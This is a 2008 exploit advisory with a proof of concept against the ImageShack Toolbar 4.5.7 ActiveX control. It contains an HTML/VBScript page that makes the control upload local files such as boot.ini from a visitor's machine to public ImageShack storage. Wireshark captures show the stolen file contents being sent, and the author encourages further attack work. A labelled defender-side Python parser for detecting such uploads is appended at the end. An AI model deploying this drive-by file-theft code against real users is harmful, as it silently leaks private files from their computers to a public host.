ImageShack Toolbar 4.5.7 FileUploader Class Insecure Method PoC
<!--
ImageShack Toolbar 4.5.7 FileUploader Class (ImageShackToolbar.dll)
insecure method poc

This tool may allow a malicious web page to post arbitrary images on the web
from a user's hard drive.
The images will be visible on the ImageShack site; an attacker could retrieve
them perhaps by tag search or by understanding the renaming operation,
e.g. "_" chars are removed and the "tq2" string is appended.

My test image is still visible here:
http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg

Note that a file with a non-image extension can cross the network. The
ImageShack server replies with an error message; however, this needs further
investigation, which I leave to you, e.g. with custom packet fields injection.

I suggest users uninstall it temporarily and just use the site functionalities.

Object safety report:
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller

rgod-tsid-pa-he-ru-ka - stay tuned with us ...
http://retrogod.altervista.org/join.html
security feeds, radio streams, techno/drum & bass stations to come
-->
<html>
<body>
<object classid='clsid:BDF9442E-9B03-42C2-87BA-2A459B0A5317' id='suntzu' /></object>
<script language='vbscript'>
suntzu.BuildSlideShow "file:///c:\\xp_wallpaper_glass.jpg","Big",1,"uhuhinterestingprivatethings","Fade","White"
suntzu.BuildSlideShow "file:///c:\\boot.ini", "Big",1,"uhuhinterestingprivatethings","Fade","White"
</script>
</body>
</html>

----

some wireshark's dump samples:

POST /upload_api.php HTTP/1.1
Content-Type: multipart/form-data, boundary=B-O-U-N-D-A-R-Y731553141
Content-Length: 21755
User-Agent: ImageShack Toolbar 4.5.7 ([..])
Host: load9.imageshack.us
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: imgshck=[..]; un_cookie=1; latest=img404; flashInstalled=9.0; __qca=[..]; rem_bar=1; nopopunder=1

--B-O-U-N-D-A-R-Y731553141
Content-Disposition: form-data; name="toolbar"

IEImageShackToolbar-4.5.7.69
--B-O-U-N-D-A-R-Y731553141
Content-Disposition: form-data; name="public"

yes
--B-O-U-N-D-A-R-Y731553141
Content-Disposition: form-data; name="xml"

newformat
--B-O-U-N-D-A-R-Y731553141
Content-Disposition: form-data; name="tags"

uhuhinterestingprivatethings
--B-O-U-N-D-A-R-Y731553141
Content-Disposition: form-data; name="rembar"

1
--B-O-U-N-D-A-R-Y731553141
Content-Disposition: form-data; name="fileupload"; filename="xp_wallpaper_glass.jpg"
Content-Type: image/jpeg
Content-Transfer-Encoding: binary

[file content]
--B-O-U-N-D-A-R-Y731553141
Content-Disposition: form-data; name="thumbupload"; filename="xp_wallpaper_glass6fa1f1.jpg"
Content-Type: image/jpeg
Content-Transfer-Encoding: binary

[file content]
--B-O-U-N-D-A-R-Y731553141
Content-Disposition: form-data; name="class"

s
--B-O-U-N-D-A-R-Y731553141--

reply:

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
X-Powered-By: PHP/5.1.2
Set-Cookie: latest=img262; expires=Sun, 18-Jan-2009 07:56:24 GMT; path=/; domain=.imageshack.us
Set-Cookie: PHPSESSID=[..]; path=/
Set-Cookie: always_opt=-1; path=/; domain=.imageshack.us
Set-Cookie: rem_bar=1; expires=Sun, 18-Jan-2009 07:56:24 GMT; path=/; domain=.imageshack.us
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Content-type: text/xml
Pragma: public
Cache-Control: must-revalidate, post-check=0, pre-check=0
Date: Thu, 24 Jan 2008 07:56:25 GMT
Server: lighttpd/1.4.8

<?xml version="1.0" encoding="iso-8859-1"?><imginfo xmlns="http//ns.imageshack.us/imginfo/6/" version="6" timestamp="1201161385">
<rating>
<ratings>0</ratings>
<avg>0.0</avg>
</rating>
<files server="262" bucket="7959">
<image size="16646" content-type="image/jpeg">xpwallpaperglasstq2.jpg</image>
<thumb size="3155" content-type="image/jpeg">xpwallpaperglasstq2.th.jpg</thumb>
</files>
<resolution>
<width>426</width>
<height>320</height>
</resolution>
<class>s</class>
<uploader>
<ip>87.11.97.155</ip>
</uploader>
<links>
<image_link>http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.jpg</image_link>
<image_html><a href="http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg" target="_blank"><img src="http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.jpg" alt="Free Image Hosting at www.ImageShack.us" border="0"/></a></image_html>
<image_bb>[URL=http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg][IMG]http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.jpg[/IMG][/URL]</image_bb>
<image_bb2>[url=http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg][img=http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.jpg][/url]</image_bb2>
<thumb_link>http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.th.jpg</thumb_link>
<thumb_html><a href="http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg" target="_blank"><img src="http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.th.jpg" alt="Free Image Hosting at www.ImageShack.us" border="0"/></a></thumb_html>
<thumb_bb>[URL=http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg][IMG]http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.th.jpg[/IMG][/URL]</thumb_bb>
<thumb_bb2>[url=http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg][img=http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.th.jpg][/url]</thumb_bb2>
<ad_link>http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg</ad_link>
<done_page>http://img262.imageshack.us/content.php?page=done&l=img262/7959/xpwallpaperglasstq2.jpg</done_page>
</links>
</imginfo>

with the boot.ini file:

POST /upload_api.php HTTP/1.1
Content-Type: multipart/form-data, boundary=B-O-U-N-D-A-R-Y732118720442
Content-Length: 1077
User-Agent: ImageShack Toolbar 4.5.7 (WinNT 5.1 Service Pack 2)
Host: load10.imageshack.us
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: imgshck=[..]; un_cookie=1; latest=img214; flashInstalled=9.0; __qca=[..]; rem_bar=1; nopopunder=1; always_opt=-1

--B-O-U-N-D-A-R-Y732118720442
Content-Disposition: form-data; name="toolbar"

IEImageShackToolbar-4.5.7.69
--B-O-U-N-D-A-R-Y732118720442
Content-Disposition: form-data; name="public"

yes
--B-O-U-N-D-A-R-Y732118720442
Content-Disposition: form-data; name="xml"

newformat
--B-O-U-N-D-A-R-Y732118720442
Content-Disposition: form-data; name="tags"

uhuhinterestingprivatethings
--B-O-U-N-D-A-R-Y732118720442
Content-Disposition: form-data; name="rembar"

1
--B-O-U-N-D-A-R-Y732118720442
Content-Disposition: form-data; name="fileupload"; filename="boot.ini"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Home Edition" / fastdetect /NoExecute=OptIn

--B-O-U-N-D-A-R-Y732118720442
Content-Disposition: form-data; name="class"

s
--B-O-U-N-D-A-R-Y732118720442--

reply:

HTTP/1.1 200 OK
Transfer-Encoding: chunked
X-Powered-By: PHP/5.1.2
Content-Type: text/xml
Set-Cookie: latest=img89; expires=Sun, 18-Jan-2009 07:56:28 GMT; path=/; domain=.imageshack.us
Date: Thu, 24 Jan 2008 07:56:28 GMT
Server: lighttpd/1.4.18

<links>
<error id="wrong_file_type">Wrong file type detected for file boot.ini:application/octet-stream</error>
</links>
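
A defender-side check for the traffic shown in the captures above, as an added example that is not part of the original advisory: it parses a captured upload request, tolerating the toolbar's comma-separated boundary parameter, and flags file parts leaving the host. The sample request, function names and alert wording are constructed for illustration.

```python
import re

# Constructed request modelled on the capture above (abbreviated, dummy file body).
SAMPLE_REQUEST = (
    "POST /upload_api.php HTTP/1.1\r\n"
    "Content-Type: multipart/form-data, boundary=B-O-U-N-D-A-R-Y1\r\n"
    "User-Agent: ImageShack Toolbar 4.5.7 (WinNT 5.1 Service Pack 2)\r\n"
    "Host: load10.imageshack.us\r\n\r\n"
    "--B-O-U-N-D-A-R-Y1\r\n"
    'Content-Disposition: form-data; name="tags"\r\n\r\n'
    "sampletag\r\n"
    "--B-O-U-N-D-A-R-Y1\r\n"
    'Content-Disposition: form-data; name="fileupload"; filename="boot.ini"\r\n'
    "Content-Type: application/octet-stream\r\n\r\n"
    "[constructed file body]\r\n"
    "--B-O-U-N-D-A-R-Y1--\r\n"
).encode()

def parse_headers(block: bytes) -> dict:
    """Map lower-cased header names to values; lines without 'Name:' are skipped."""
    pairs = (line.partition(":") for line in block.decode("latin-1").split("\r\n"))
    return {n.strip().lower(): v.strip() for n, sep, v in pairs if sep and " " not in n}

def inspect_upload(raw: bytes) -> dict:
    """Summarise one captured POST and list reasons it deserves an analyst's look."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = parse_headers(head)
    report = {"toolbar": headers.get("user-agent", "").startswith("ImageShack Toolbar"),
              "fields": {}, "files": [], "alerts": []}
    # The toolbar writes "multipart/form-data, boundary=" (comma); accept "," or ";".
    m = re.search(r"boundary=([^\s;,]+)", headers.get("content-type", ""))
    if not m:
        return report
    for part in body.split(b"--" + m.group(1).strip('"').encode())[1:]:
        if part.startswith(b"--"):  # closing delimiter
            break
        phead, _, pbody = part.strip(b"\r\n").partition(b"\r\n\r\n")
        ph = parse_headers(phead)
        disp = dict(re.findall(r'(\w+)="([^"]*)"', ph.get("content-disposition", "")))
        if "filename" in disp:
            ctype = ph.get("content-type", "")
            report["files"].append((disp.get("name"), disp["filename"], ctype))
            if not ctype.startswith("image/"):
                report["alerts"].append(f"non-image upload: {disp['filename']} ({ctype})")
        else:
            report["fields"][disp.get("name")] = pbody.decode("latin-1")
    if report["toolbar"] and report["files"]:
        report["alerts"].append("local file sent by ImageShack Toolbar upload API client")
    return report
```
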